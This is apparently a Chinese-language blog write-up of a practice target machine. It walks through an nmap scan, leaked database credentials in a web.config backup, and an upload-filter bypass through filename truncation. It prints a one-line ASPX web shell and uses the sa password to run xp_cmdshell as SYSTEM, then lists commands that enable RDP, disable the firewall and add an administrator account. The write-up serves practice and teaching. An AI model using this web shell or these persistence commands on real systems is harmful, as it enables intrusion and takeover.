写在开始

这是一个有后台上传和mssql提权的一个靶机的Write Up

过程

首先用nmap扫一下这个机器
2023-08-03T09:02:28.png
发现开了一个1433端口的mssql和27689端口的http服务器,首先登录这个http服务器看里面的情况。
2023-08-03T09:03:52.png
发现是个文件上传下载系统,而且好像是个aspx的服务。
dirsearch扫一下网站
2023-08-03T09:05:14.png
发现有个web.config.bak文件,下载下来看看内容
2023-08-03T09:05:57.png
拿到一个数据库用户名密码还有数据库名称用户名down,密码downsql,登录进去看看
2023-08-03T09:06:39.png
有个key,拿一下
2023-08-03T09:07:28.png
然后拿到用户名密码,登录后台可以得到另一个key
2023-08-03T10:08:39.png
测试文件上传可以发现识别文件后缀和Content-Type,修改后可以上传,
2023-08-03T10:10:14.png
并且文件名有32字符自动切割的方式,通过测试可得可以上传名为12345678.aspx.jpg的图片,并被自动切割成638266750305458046-12345678.aspx文件,接下来可以查看文件url,可以得到一个http://172.16.1.92:27689/admin/file_down.aspx?file=638266750305458046-12345678.aspx的下载链接。
2023-08-03T10:12:15.png
删掉get请求后可以令其抛出异常
2023-08-03T10:13:12.png
可以看到其trace中包含filepath相关的代码,可以看出路径在当前路径的../upfile/affix/也就是http://172.16.1.92:27689/upfile/affix/,手动拼接文件名和该路径可以得到文件的链接,以此方式上传蚁剑一句话木马

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

之后使用蚁剑连接,可以看到有一个web.config.bak.2017-12-12
2023-08-03T10:17:05.png
打开后可以看到sa的密码:cisp-pte@sa
2023-08-03T10:17:45.png
之后使用sa连接数据库后执行命令exec master..xp_cmdshell 'whoami';
2023-08-03T10:18:37.png
可以看到是system权限
然后用这个博客的弹shell的方式弹一个shell回来就行了。


然而这是Win2003,没有PowerShell,所以直接建账户开3389进完事了。开3389的命令如下

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关防火墙

netsh advfirewall set allprofiles state off

Win2003关防火墙

net stop sharedaccess

建账户并设置为管理员

net user username "password" /ADD
net localgroup Administrators username /ADD

写在最后

意料之外的是这个系统太老了,居然连PowerShell都没有,就很尴尬.

Last modification:August 3, 2023
如果觉得我的文章对你有用,请随意赞赏